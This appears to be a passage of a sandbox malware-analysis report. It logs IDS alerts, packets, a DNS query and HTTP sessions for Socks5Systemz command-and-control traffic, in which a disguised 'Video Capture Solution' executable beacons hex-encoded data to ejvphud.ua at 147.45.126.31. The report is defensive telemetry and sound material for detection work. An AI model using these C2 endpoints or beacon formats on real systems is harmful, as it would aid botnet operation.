2024-12-16T14:53:40.596098+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49840 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:42.202730+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49846 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:42.202730+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49846 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:42.800414+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49846 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:42.800414+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49846 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:44.551366+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49852 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:44.551366+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49852 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:46.194494+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49858 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:46.194494+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49858 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:47.807861+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49861 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:47.807861+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49861 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:49.453296+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49865 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:49.453296+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49865 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:50.052934+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49865 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:50.052934+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49865 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:51.727399+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49870 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:51.727399+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49870 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:53.322584+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49876 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:53.322584+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49876 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:54.934871+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49881 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:54.934871+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49881 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:55.522260+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49881 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:55.522260+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49881 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:57.108278+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49887 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:57.108278+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49887 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:57.707007+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49887 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:57.707007+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49887 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:59.334096+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49894 | 147.45.126.31 | 80 | TCP
2024-12-16T14:53:59.334096+0100 | 2050112 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.4 | 49894 | 147.45.126.31 | 80 | TCP
2024-12-16T14:54:00.963510+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.4 | 49897 | 147.45.126.31 | 80 | TCP
                                                        2024-12-16T14:54:00.963510+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449897147.45.126.3180TCP
                                                        2024-12-16T14:54:02.553198+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449901147.45.126.3180TCP
                                                        2024-12-16T14:54:02.553198+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449901147.45.126.3180TCP
                                                        2024-12-16T14:54:04.619418+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449907147.45.126.3180TCP
                                                        2024-12-16T14:54:04.619418+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449907147.45.126.3180TCP
                                                        2024-12-16T14:54:06.313221+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449913147.45.126.3180TCP
                                                        2024-12-16T14:54:06.313221+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449913147.45.126.3180TCP
                                                        2024-12-16T14:54:07.978534+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449917147.45.126.3180TCP
                                                        2024-12-16T14:54:07.978534+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449917147.45.126.3180TCP
                                                        2024-12-16T14:54:10.024480+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449922147.45.126.3180TCP
                                                        2024-12-16T14:54:10.024480+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449922147.45.126.3180TCP
                                                        2024-12-16T14:54:11.689372+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449926147.45.126.3180TCP
                                                        2024-12-16T14:54:11.689372+01002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449926147.45.126.3180TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Dec 16, 2024 14:53:40.838342905 CET8049840147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:40.838383913 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:40.838409901 CET4984080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:40.958281994 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:42.202605009 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:42.202729940 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:42.314868927 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:42.434962988 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:42.800298929 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:42.800414085 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:42.919997931 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:42.920128107 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:43.040384054 CET8049852147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:43.040479898 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:43.040591955 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:43.040669918 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:43.043298960 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:43.160543919 CET8049852147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:44.551151037 CET8049852147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:44.551366091 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.670789957 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.671099901 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.791400909 CET8049858147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:44.791727066 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.791795969 CET8049852147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:44.791881084 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.791974068 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.911770105 CET8049858147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:46.194381952 CET8049858147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:46.194494009 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.310650110 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.311073065 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.431998968 CET8049858147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:46.432040930 CET8049861147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:46.432115078 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.432176113 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.432416916 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.552248001 CET8049861147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:47.807670116 CET8049861147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:47.807861090 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:47.920120955 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:47.920380116 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:48.040304899 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:48.040477991 CET8049861147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:48.040558100 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:48.040592909 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:48.040822983 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:48.160624981 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:49.453177929 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:49.453295946 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:49.561417103 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:49.681849957 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:50.052721024 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:50.052933931 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.169753075 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.170119047 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.290116072 CET8049870147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:50.290595055 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:50.290838003 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.290841103 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.291291952 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.411128044 CET8049870147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:51.727293015 CET8049870147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:51.727399111 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.841954947 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.842282057 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.962352037 CET8049876147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:51.962512016 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.962718964 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.962863922 CET8049870147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:51.962948084 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:52.082813025 CET8049876147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:53.322369099 CET8049876147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:53.322583914 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.436403990 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.436801910 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.556785107 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:53.556904078 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.557111025 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.557425976 CET8049876147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:53.557507992 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.676980019 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:54.934684038 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:54.934870958 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.045795918 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.166157007 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:55.522017002 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:55.522259951 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.638622999 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.638987064 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.758876085 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:55.759083033 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:55.759126902 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.759140015 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.759183884 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.879048109 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.107979059 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.108278036 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.218097925 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.338148117 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.706929922 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.707006931 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.827644110 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.827847958 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.947638035 CET8049894147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.947792053 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.947946072 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.948091984 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.948272943 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:58.068047047 CET8049894147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:59.333841085 CET8049894147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:59.334095955 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.452075958 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.452379942 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.572218895 CET8049897147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:59.572385073 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.572628021 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.572993994 CET8049894147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:59.573081970 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.693269968 CET8049897147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:00.963429928 CET8049897147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:00.963510036 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.077125072 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.077548027 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.197894096 CET8049901147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:01.198121071 CET8049897147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:01.198127031 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.198189020 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.198599100 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.318669081 CET8049901147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:02.553124905 CET8049901147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:02.553198099 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.137770891 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.138098001 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.258057117 CET8049907147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:03.258145094 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.258450031 CET8049901147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:03.258716106 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.299094915 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.419260025 CET8049907147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:04.619347095 CET8049907147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:04.619417906 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.737021923 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.737504005 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.857501030 CET8049913147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:04.857522964 CET8049907147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:04.857614040 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.857655048 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.857968092 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.978071928 CET8049913147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:06.313155890 CET8049913147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:06.313220978 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.438663006 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.439079046 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.560059071 CET8049913147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:06.560110092 CET8049917147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:06.560121059 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.560189962 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.560362101 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.680346012 CET8049917147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:07.976918936 CET8049917147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:07.978533983 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.502345085 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.502638102 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.622750998 CET8049922147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:08.623028994 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.623197079 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.623270035 CET8049917147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:08.623353958 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.743459940 CET8049922147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:10.024416924 CET8049922147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:10.024480104 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.141938925 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.142369986 CET4992680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.262574911 CET8049926147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:10.262598991 CET8049922147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:10.262679100 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.262676001 CET4992680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.264815092 CET4992680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.384881973 CET8049926147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:11.688627958 CET8049926147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:11.689372063 CET4992680192.168.2.4147.45.126.31
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 14:52:59.095768929 CET | 51254 | 53 | 192.168.2.4 | 91.211.247.248
Dec 16, 2024 14:52:59.366961002 CET | 53 | 51254 | 91.211.247.248 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 14:52:59.095768929 CET | 192.168.2.4 | 91.211.247.248 | 0x23c8 | Standard query (0) | ejvphud.ua | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 14:52:59.366961002 CET | 91.211.247.248 | 192.168.2.4 | 0x23c8 | No error (0) | ejvphud.ua |  | 147.45.126.31 | A (IP address) | IN (0x0001) | false
                                                        • ejvphud.ua
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:52:59.546335936 CET | 317 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923d HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:00.969518900 CET | 952 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
Dec 16, 2024 14:53:04.420773029 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:04.945204020 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49750 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:05.182233095 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:06.672065020 CET | 814 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
                                                        Data Raw: 32 35 65 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 66 38 66 63 66 66 35 31 65 31 38 65 39 62 64 35 35 65 61 30 34 63 61 66 38 38 32 65 65 39 65 38 36 34 64 38 30 34 63 64 38 65 34 64 61 33 36 32 39 61 36 34 66 66 63 63 61 63 36 31 38 32 32 66 37 37 36 35 61 61 38 37 66 66 37 36 37 61 39 33 33 35 65 63 39 66 62 63 64 30 61 63 36 35 64 63 63 37 39 62 35 30 65 66 64 33 37 38 33 32 63 65 35 31 30 61 36 36 36 63 65 35 34 62 33 66 64 34 66 65 39 35 62 36 31 34 31 65 65 32 36 37 39 39 36 33 62 36 64 38 64 66 66 31 31 63 30 65 34 39 34 39 64 33 33 64 33 36 39 39 35 30 38 64 63 35 31 39 31 32 62 62 30 35 65 62 39 65 38 35 66 32 31 65 64 37 30 64 61 66 66 36 37 62 62 38 66 65 64 63 62 34 62 65 30 33 66 64 37 31 37 33 31 35 38 35 30 32 34 65 33 32 35 37 32 30 33 36 30 62 31 66 32 38 66 66 64 38 33 33 33 35 35 65 30 34 32 37 61 32 35 66 34 32 66 35 64 66 37 66 37 65 36 38 61 66 38 32 30 37 65 61 31 66 33 34 36 39 31 38 34 65 35 37 38 32 37 31 [TRUNCATED]


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49755 | Destination IP: 147.45.126.31 | Destination Port: 80 | PID: 7156
Process: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe

Timestamp: Dec 16, 2024 14:53:07.026691914 CET | Bytes transferred: 325 | Direction: OUT
